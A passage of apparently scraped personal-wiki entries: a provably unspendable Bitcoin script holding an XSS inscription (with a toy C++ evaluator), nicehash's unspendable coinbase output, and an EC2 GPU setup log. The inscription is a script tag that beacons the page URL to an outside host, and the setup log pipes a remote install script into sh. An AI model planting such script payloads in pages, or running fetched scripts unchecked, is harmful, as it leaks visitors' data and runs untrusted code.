Output 0 does:
OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF OP_FROMALTSTACK <large xss constant> OP_DROP
where the large constant is an interesting inscription to test for the presence of XSS attacks on blockchain explorers:
<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>
This is almost spendable with:
1 OP_TOALTSTACK 10 1 2
but that fails because the altstack is cleared between the input and the output script, so this output is provably unspendable.
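As a concrete illustration, here is a toy C++ sketch of the stack evaluation (not real Bitcoin consensus code; the large inscription is replaced by a placeholder constant). If the altstack were preserved between the two scripts, evaluation would end with a truthy 1 on top of the stack, but since Bitcoin clears the altstack, OP_FROMALTSTACK finds it empty and the spend fails:
// Toy model of the evaluation above, not real Bitcoin consensus code.
#include <cstdint>
#include <iostream>
#include <vector>

int main() {
    // Set to false to see the "almost spendable" outcome.
    bool clear_altstack_between_scripts = true; // what Bitcoin actually does

    std::vector<int64_t> stack, altstack;

    // Input script: 1 OP_TOALTSTACK 10 1 2
    stack.push_back(1);
    altstack.push_back(stack.back()); stack.pop_back(); // OP_TOALTSTACK
    stack.push_back(10);
    stack.push_back(1);
    stack.push_back(2);

    if (clear_altstack_between_scripts)
        altstack.clear();

    // Output script: OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF
    //                OP_FROMALTSTACK <large xss constant> OP_DROP
    auto pop = [](std::vector<int64_t> &s) { int64_t v = s.back(); s.pop_back(); return v; };
    stack.push_back(pop(stack) + pop(stack));   // OP_ADD: 2 + 1 = 3
    stack.push_back(pop(stack) + pop(stack));   // OP_ADD: 3 + 10 = 13
    stack.push_back(13);                        // push 13
    stack.push_back(pop(stack) == pop(stack));  // OP_EQUAL: 1 (true)
    if (!pop(stack)) {                          // OP_NOTIF ... OP_ENDIF
        std::cout << "OP_RETURN hit: invalid\n";
        return 1;
    }
    if (altstack.empty()) {                     // OP_FROMALTSTACK on an empty altstack fails
        std::cout << "OP_FROMALTSTACK on empty altstack: invalid\n";
        return 1;
    }
    stack.push_back(pop(altstack));             // OP_FROMALTSTACK: the 1 from the input script
    stack.push_back(0x42);                      // placeholder for the large XSS constant
    pop(stack);                                 // OP_DROP

    // The spend is valid iff the final top of the stack is truthy.
    std::cout << (stack.back() ? "valid\n" : "invalid\n");
}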
Malandragem Updated 2025-07-16
In this malformed coinbase transaction, the mining pool "nicehash" produced a provably unspendable Bitcoin output script due to a bug, and therefore lost most of the block reward of 6.25 BTC, then worth about $123,000.
The output is unspendable because it ends in a constant 0: whatever the input script does, the final top of the stack is that 0, which counts as false, so validation always fails. The disassembly of the first and main output is this series of constants:
0 017fed86bba5f31f955f8b316c7fb9bd45cb6cbc 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
and for the second smaller one:
aa21a9ed62ec16bf1a388c7884e9778ddb0e26c0bf982dada47aaa5952347c0993da 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
the third one being an OP_RETURN message.
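As a minimal sketch in the same toy C++ stack model as above (again not real consensus code): the script is nothing but data pushes, so the final top of the stack is whatever the last push was, and here that is always a 0:
#include <iostream>
#include <string>
#include <vector>

int main() {
    std::vector<std::string> stack; // stack of byte vectors, hex-encoded here
    // The output script only pushes constants; whatever the input script left
    // below on the stack is irrelevant. The last push in both outputs above is
    // a 0, i.e. an empty byte vector, which counts as false.
    stack.push_back("017fed86bba5f31f955f8b316c7fb9bd45cb6cbc");
    stack.push_back(""); // the final 0
    // A spend is valid only if the final top of the stack is truthy.
    std::cout << (stack.back().empty() ? "unspendable\n" : "spendable\n");
}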
Billy Mitchell (gamer) Updated 2025-07-16
Video 1. When Cartoon Network Destroyed Billy Mitchell by Karl Jobst.
U-Math Updated 2025-07-16
Amazon EC2 GPU Updated 2025-07-16
As of December 2023, the cheapest instance with an Nvidia GPU is g4dn.xlarge, so let's try that out. On that instance, lspci contains:
00:1e.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)
so we see that it runs an Nvidia T4 GPU.
Be careful not to confuse it with g4ad.xlarge, which has an AMD GPU instead. TODO meaning of "ad"? "a" presumably means AMD, but what is the "d"?
Some documentation on which GPU is in each instance can be seen at: docs.aws.amazon.com/dlami/latest/devguide/gpu.html (archive) with a list of which GPUs they have at that random point in time. Can the GPU ever change for a given instance name? Likely not. Also, as of December 2023 the list is already outdated, e.g. P5 is not shown, though it is mentioned at: aws.amazon.com/ec2/instance-types/p5/
When selecting the instance to launch, the GPU apparently does not show anywhere on the instance information page, it is so bad!
Also note that this instance has 4 vCPUs, so on a new account you must first make a customer support request to Amazon to increase your limit from the default of 0 to 4, see also: stackoverflow.com/questions/68347900/you-have-requested-more-vcpu-capacity-than-your-current-vcpu-limit-of-0, otherwise instance launch will fail with:
You have requested more vCPU capacity than your current vCPU limit of 0 allows for the instance bucket that the specified instance type belongs to. Please visit aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit.
When starting up the instance, also select:
Once you finally manage to SSH into the instance, we first have to install the Nvidia drivers and reboot:
sudo apt update
sudo apt install nvidia-driver-510 nvidia-utils-510 nvidia-cuda-toolkit
sudo reboot
and now running:
nvidia-smi
shows something like:
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 525.147.05   Driver Version: 525.147.05   CUDA Version: 12.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            Off  | 00000000:00:1E.0 Off |                    0 |
| N/A   25C    P8    12W /  70W |      2MiB / 15360MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+
From there basically everything should just work as normal. E.g. we were able to run a CUDA hello world just fine with:
nvcc inc.cu
./a.out
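The contents of inc.cu are not reproduced here; as a rough sketch of the kind of file this exercises (the file name and kernel are just assumptions for illustration), a minimal CUDA program that increments one integer on the GPU would look something like:
// Hypothetical minimal example in the spirit of inc.cu: increment one integer
// on the GPU and check the result on the host. Only a sketch, not the actual
// file used above.
#include <cassert>
#include <cuda_runtime.h>

__global__ void inc(int *x) {
    *x = *x + 1;
}

int main() {
    int host = 1;
    int *dev;
    cudaMalloc(&dev, sizeof(int));
    cudaMemcpy(dev, &host, sizeof(int), cudaMemcpyHostToDevice);
    inc<<<1, 1>>>(dev);
    cudaMemcpy(&host, dev, sizeof(int), cudaMemcpyDeviceToHost);
    cudaFree(dev);
    assert(host == 2);
}
which compiles and runs with the two commands above.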
One issue with this setup, besides the time it takes to set up, is that you might also have to pay some network charges as it downloads a bunch of stuff into the instance. We should try out some of the pre-built images. But it is also good to know this pristine setup just in case.
We then managed to run Ollama just fine with:
curl https://ollama.ai/install.sh | sh
/bin/time ollama run llama2 'What is quantum field theory?'
which gave:
0.07user 0.05system 0:16.91elapsed 0%CPU (0avgtext+0avgdata 16896maxresident)k
0inputs+0outputs (0major+1960minor)pagefaults 0swaps
so way faster than on my local desktop CPU, hurray.
After setup as per: askubuntu.com/a/1309774/52975 we were able to run:
head -n1000 pap.txt | ARGOS_DEVICE_TYPE=cuda time argos-translate --from-lang en --to-lang fr > pap-fr.txt
which gave:
77.95user 2.87system 0:39.93elapsed 202%CPU (0avgtext+0avgdata 4345988maxresident)k
0inputs+88outputs (0major+910748minor)pagefaults 0swaps
so only marginally better than on the P14s. It would be fun to see how much faster we could make things on a more powerful GPU.
Hunt Updated 2025-07-16
These were found by running object detection software for porn/nudity detection. We need to run some more, as all sex was likely missed: github.com/GantMan/nsfw_model/issues/160
